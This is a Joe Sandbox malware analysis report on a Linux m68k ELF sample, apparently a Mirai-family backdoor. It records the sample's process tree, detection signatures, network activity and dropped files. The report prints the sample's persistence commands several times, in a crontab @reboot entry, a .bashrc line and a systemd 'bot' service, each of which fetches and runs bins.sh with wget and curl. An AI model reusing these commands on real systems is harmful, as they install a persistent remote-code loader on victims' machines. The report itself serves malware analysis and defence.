Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
m68k.elf

Overview

General Information

Sample name:m68k.elf
Analysis ID:1558937
MD5:d7eaa2bceba9d7e0d2aa38e1ce1a3649
SHA1:77ca39cd70efba9684b254b9397881c8fb85b71d
SHA256:e5cc8bce6857e01c4c2ccc7ca4cfb47a5578c6a2b940be2e99c122589390fdc1
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected non-DNS traffic on DNS port
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1558937
Start date and time:2024-11-20 00:56:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 51s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:m68k.elf
Detection:MAL
Classification:mal60.troj.linELF@0/4@25/0
  • VT rate limit hit for: host.zopz-api.com
Command:/tmp/m68k.elf
PID:6224
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • m68k.elf (PID: 6224, Parent: 6147, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/m68k.elf
    • m68k.elf New Fork (PID: 6226, Parent: 6224)
      • m68k.elf New Fork (PID: 6228, Parent: 6226)
      • m68k.elf New Fork (PID: 6230, Parent: 6226)
      • m68k.elf New Fork (PID: 6232, Parent: 6226)
      • m68k.elf New Fork (PID: 6234, Parent: 6226)
      • sh (PID: 6234, Parent: 6226, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 6240, Parent: 6234)
          • sh New Fork (PID: 6242, Parent: 6240)
          • crontab (PID: 6242, Parent: 6240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 6243, Parent: 6240)
          • chmod (PID: 6243, Parent: 6240, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 6244, Parent: 6240)
          • sh (PID: 6244, Parent: 6240, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 6245, Parent: 6240)
          • curl (PID: 6245, Parent: 6240, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
          • sh New Fork (PID: 6249, Parent: 6240)
          • chmod (PID: 6249, Parent: 6240, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
        • sh (PID: 6240, Parent: 6234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
        • sh New Fork (PID: 6241, Parent: 6234)
        • crontab (PID: 6241, Parent: 6234, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • m68k.elf New Fork (PID: 6250, Parent: 6226)
      • sh (PID: 6250, Parent: 6226, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/systemctl enable bot"
        • sh New Fork (PID: 6254, Parent: 6250)
        • systemctl (PID: 6254, Parent: 6250, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot
  • systemd New Fork (PID: 6257, Parent: 6256)
  • snapd-env-generator (PID: 6257, Parent: 6256, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • dash New Fork (PID: 6331, Parent: 4331)
  • rm (PID: 6331, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb
  • dash New Fork (PID: 6332, Parent: 4331)
  • rm (PID: 6332, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: m68k.elfReversingLabs: Detection: 28%
Source: m68k.elfString: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
Source: m68k.elfString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: m68k.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrc
Source: .bashrc.13.drString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.drString: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: global trafficTCP traffic: 192.168.2.23:42134 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.23:42124 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.23:42130 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.23:42132 -> 8.8.8.8:53
Source: /bin/curl (PID: 6245)Reads hosts file: /etc/hostsJump to behavior
Source: /tmp/m68k.elf (PID: 6224)Socket: 127.0.0.1:4161Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: cdn.fwupd.org
Source: global trafficDNS traffic detected: DNS query: host.zopz-api.com
Source: tmp.aHD8f7.22.drString found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.drString found in binary or memory: http://serverip/bins/bins.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39282
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 39282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/4@25/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6242)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6241)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/m68k.elf (PID: 6226)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 6241)File: /var/spool/cron/crontabs/tmp.aHD8f7Jump to behavior
Source: /usr/bin/crontab (PID: 6241)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/m68k.elf (PID: 6226)File: /root/.bashrcJump to behavior
Source: /bin/curl (PID: 6245)Directory: /root/.curlrcJump to behavior
Source: /tmp/m68k.elf (PID: 6234)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
Source: /tmp/m68k.elf (PID: 6250)Shell command executed: sh -c "/bin/systemctl enable bot"Jump to behavior
Source: /bin/sh (PID: 6243)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 6249)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /usr/bin/dash (PID: 6331)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsbJump to behavior
Source: /usr/bin/dash (PID: 6332)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsbJump to behavior
Source: /bin/sh (PID: 6254)Systemctl executable: /bin/systemctl -> /bin/systemctl enable botJump to behavior
Source: /tmp/m68k.elf (PID: 6224)Queries kernel information via 'uname': Jump to behavior
Source: /bin/curl (PID: 6245)Queries kernel information via 'uname': Jump to behavior
Source: m68k.elf, 6224.1.000055c186832000.000055c1868df000.rw-.sdmp, m68k.elf, 6226.1.000055c186832000.000055c1868df000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/m68k
Source: m68k.elf, 6224.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp, m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
Source: m68k.elf, 6224.1.000055c186832000.000055c1868df000.rw-.sdmp, m68k.elf, 6226.1.000055c186832000.000055c1868df000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
Source: m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: m68k.elf, 6224.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp, m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
File and Directory Permissions Modification
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scheduled Task/Job
1
Scheduled Task/Job
1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Scripting
Login HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558937 Sample: m68k.elf Startdate: 20/11/2024 Architecture: LINUX Score: 60 51 109.202.202.202, 80 INIT7CH Switzerland 2->51 53 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->53 55 4 other IPs or domains 2->55 57 Multi AV Scanner detection for submitted file 2->57 10 m68k.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        14 dash rm 2->14         started        16 dash rm 2->16         started        signatures3 process4 process5 18 m68k.elf 10->18         started        file6 47 /root/.bashrc, ASCII 18->47 dropped 59 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 18->59 22 m68k.elf sh 18->22         started        24 m68k.elf sh 18->24         started        26 m68k.elf 18->26         started        28 2 other processes 18->28 signatures7 process8 process9 30 sh crontab 22->30         started        34 sh sh 22->34         started        36 sh systemctl 24->36         started        file10 49 /var/spool/cron/crontabs/tmp.aHD8f7, ASCII 30->49 dropped 63 Sample tries to persist itself using cron 30->63 65 Executes the "crontab" command typically for achieving persistence 30->65 38 sh crontab 34->38         started        41 sh chmod 34->41         started        43 sh sh 34->43         started        45 2 other processes 34->45 signatures11 process12 signatures13 61 Executes the "crontab" command typically for achieving persistence 38->61
SourceDetectionScannerLabelLink
m68k.elf29%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
cdn.fwupd.org
unknown
unknownfalse
    high
    host.zopz-api.com
    unknown
    unknownfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://serverip/bins/bins.shtmp.aHD8f7.22.drfalse
        high
        http://serverip/bins/bins.sh;bot.service.13.drfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          34.249.145.219
          unknownUnited States
          16509AMAZON-02USfalse
          109.202.202.202
          unknownSwitzerland
          13030INIT7CHfalse
          91.189.91.43
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          91.189.91.42
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          34.249.145.219mmb3.elfGet hashmaliciousMirai, OkiruBrowse
            wnbw86.elfGet hashmaliciousMiraiBrowse
              wriww68k.elfGet hashmaliciousMiraiBrowse
                wheiuwa4.elfGet hashmaliciousMiraiBrowse
                  dUqzOmXv5z.elfGet hashmaliciousUnknownBrowse
                    sshd.elfGet hashmaliciousUnknownBrowse
                      tftp.elfGet hashmaliciousUnknownBrowse
                        bot.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                          main_m68k.elfGet hashmaliciousMiraiBrowse
                            Satan.arm.elfGet hashmaliciousMiraiBrowse
                              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                              91.189.91.43.i.elfGet hashmaliciousUnknownBrowse
                                kjsusa6.elfGet hashmaliciousUnknownBrowse
                                  mmb6.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                    mmb9.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                      ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                                        mmb1.elfGet hashmaliciousMirai, OkiruBrowse
                                          mmb3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                            mmb4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                              sshd.elfGet hashmaliciousUnknownBrowse
                                                mmb2.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CANONICAL-ASGB.i.elfGet hashmaliciousUnknownBrowse
                                                  • 91.189.91.42
                                                  kjsusa6.elfGet hashmaliciousUnknownBrowse
                                                  • 91.189.91.42
                                                  mmb6.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  mmb9.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                                                  • 91.189.91.42
                                                  mmb1.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 91.189.91.42
                                                  mmb3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  mmb4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  sshd.elfGet hashmaliciousUnknownBrowse
                                                  • 91.189.91.42
                                                  mmb2.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  CANONICAL-ASGB.i.elfGet hashmaliciousUnknownBrowse
                                                  • 91.189.91.42
                                                  kjsusa6.elfGet hashmaliciousUnknownBrowse
                                                  • 91.189.91.42
                                                  mmb6.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  mmb9.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                                                  • 91.189.91.42
                                                  mmb1.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 91.189.91.42
                                                  mmb3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  mmb4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  sshd.elfGet hashmaliciousUnknownBrowse
                                                  • 91.189.91.42
                                                  mmb2.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 91.189.91.42
                                                  INIT7CH.i.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  kjsusa6.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  mmb6.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 109.202.202.202
                                                  mmb9.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 109.202.202.202
                                                  ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                                                  • 109.202.202.202
                                                  mmb1.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 109.202.202.202
                                                  mmb3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 109.202.202.202
                                                  mmb4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 109.202.202.202
                                                  sshd.elfGet hashmaliciousUnknownBrowse
                                                  • 109.202.202.202
                                                  mmb2.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 109.202.202.202
                                                  AMAZON-02USfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 13.32.110.123
                                                  NTS_eTaxInvoice.htmlGet hashmaliciousUnknownBrowse
                                                  • 3.160.150.2
                                                  QuarantineMessage.zipGet hashmaliciousUnknownBrowse
                                                  • 75.2.57.54
                                                  https://usapress.info/inside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years/Get hashmaliciousUnknownBrowse
                                                  • 52.49.33.63
                                                  https://l.facebook.com/l.php?u=https%3A%2F%2Fusapress.info%2Finside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0r3IVxCUPtQPPqP5Ce0_adoAsiHgG3Oy1cYDq3k1JXBIrTGLtjToxlazM_aem_q02YsKkKY0QB_fm5suzUDw&h=AT1Xo_CkNlagO29_sds-m5zdTBZ6-H70m0J__7wjjmSNinwNGqBfRUFK3cH2zXJWNO7msrJPRkNulrkTmUCLkRNMcfCJTNK-cs4SfUQyRy7nw3vP1DNmFisBvlttaen8fHfi-N3lXN_BGQgdBw&__tn__=R%5D-R&c%5B0%5D=AT3euz91upHKeMVK8p24ktUFKClJ0GKt_3lJnV9tGakx0Tro3u7Ymk1z4tOG4eBZxcuD-Ny10eAla4iUyfdG04Fh4GryHwAMuELGG4dQctfWKiu4mfB-eLJ8Qktnq0ptzD_TaZEPEMHQnvP4W65jDpc-XBmWlMSmaRM-2soPhaPGYAODWegqP8h47S90Q2hmwQvQgUDdb35OgV1duzzqudMAyOk7e8E7mfpnrlwhIvWwUkK53AUNuPTqYkQGet hashmaliciousUnknownBrowse
                                                  • 52.49.33.63
                                                  https://file.privacy-shield.cc/prvcy/PrivacyShield.MsixGet hashmaliciousUnknownBrowse
                                                  • 13.32.121.78
                                                  https://ledger-checks.s3.us-east-1.amazonaws.com/index.htmlGet hashmaliciousUnknownBrowse
                                                  • 52.216.217.10
                                                  Customer forms.pdfGet hashmaliciousUnknownBrowse
                                                  • 13.224.189.74
                                                  https://doc-zionsurgery.jimdosite.com/Get hashmaliciousHTMLPhisherBrowse
                                                  • 54.171.97.194
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                  • 108.139.47.33
                                                  No context
                                                  No context
                                                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):76
                                                  Entropy (8bit):3.7627880354948586
                                                  Encrypted:false
                                                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                  Process:/tmp/m68k.elf
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):178
                                                  Entropy (8bit):4.358630015292201
                                                  Encrypted:false
                                                  SSDEEP:3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
                                                  MD5:C3685F292213652676F734AB36C060EE
                                                  SHA1:1D05F7F6302EC60E7990DE4BBE9180C149EFC731
                                                  SHA-256:D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C
                                                  SHA-512:7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview:./bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".
                                                  Process:/tmp/m68k.elf
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):356
                                                  Entropy (8bit):4.9110117370593995
                                                  Encrypted:false
                                                  SSDEEP:6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
                                                  MD5:F03C70CD4C61A1852F9E19B8FB0D639C
                                                  SHA1:A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008
                                                  SHA-256:AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90
                                                  SHA-512:6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.
                                                  Process:/usr/bin/crontab
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):235
                                                  Entropy (8bit):5.1026069467163655
                                                  Encrypted:false
                                                  SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvaNFXqZHGMQ5UYLtCFt3HY8jsHB:8QjHig8mXeeHLUHY8mB
                                                  MD5:78504BD41E411D1931F6C74D59E68598
                                                  SHA1:47F90D5B6A9578E07DF6A55282F251D66520405D
                                                  SHA-256:C8805FB4ECC3E5D3EEE0C5911E7038E9CCD59979BEAE6F89E4AA0093DC05AC6A
                                                  SHA-512:A2C92D3EC614FFEE60481B7F7261FA0EDBA9733F2588D45884FC91E82A347115649764D2DB08AE49A861899AEDC2548E5FB6D79C26A4781D64CDE718E074864C
                                                  Malicious:true
                                                  Reputation:low
                                                  Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Nov 19 17:57:02 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://serverip/bins/bins.sh.
                                                  File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                  Entropy (8bit):6.278250752108479
                                                  TrID:
                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                  File name:m68k.elf
                                                  File size:81'348 bytes
                                                  MD5:d7eaa2bceba9d7e0d2aa38e1ce1a3649
                                                  SHA1:77ca39cd70efba9684b254b9397881c8fb85b71d
                                                  SHA256:e5cc8bce6857e01c4c2ccc7ca4cfb47a5578c6a2b940be2e99c122589390fdc1
                                                  SHA512:150c66f98971175c7ef3d45e12586dcb84941a9d349ce3593ef587e449b9d9afd8ce6ffd69c9e0fe74931a9b015189814793b99a4bc8b758a4618c7b56cb6ad5
                                                  SSDEEP:1536:7r9VBgyqw9wgPpTW0HCrBvY8rxXzztzHGpzs3mX3Ftq5ixE:7r9VBdqsPsiCrBv9LzHszsWu+E
                                                  TLSH:16832A97B801CE6EF40BE6FA44E308157631BBA64D930F76B256FCE3A9351D41922F81
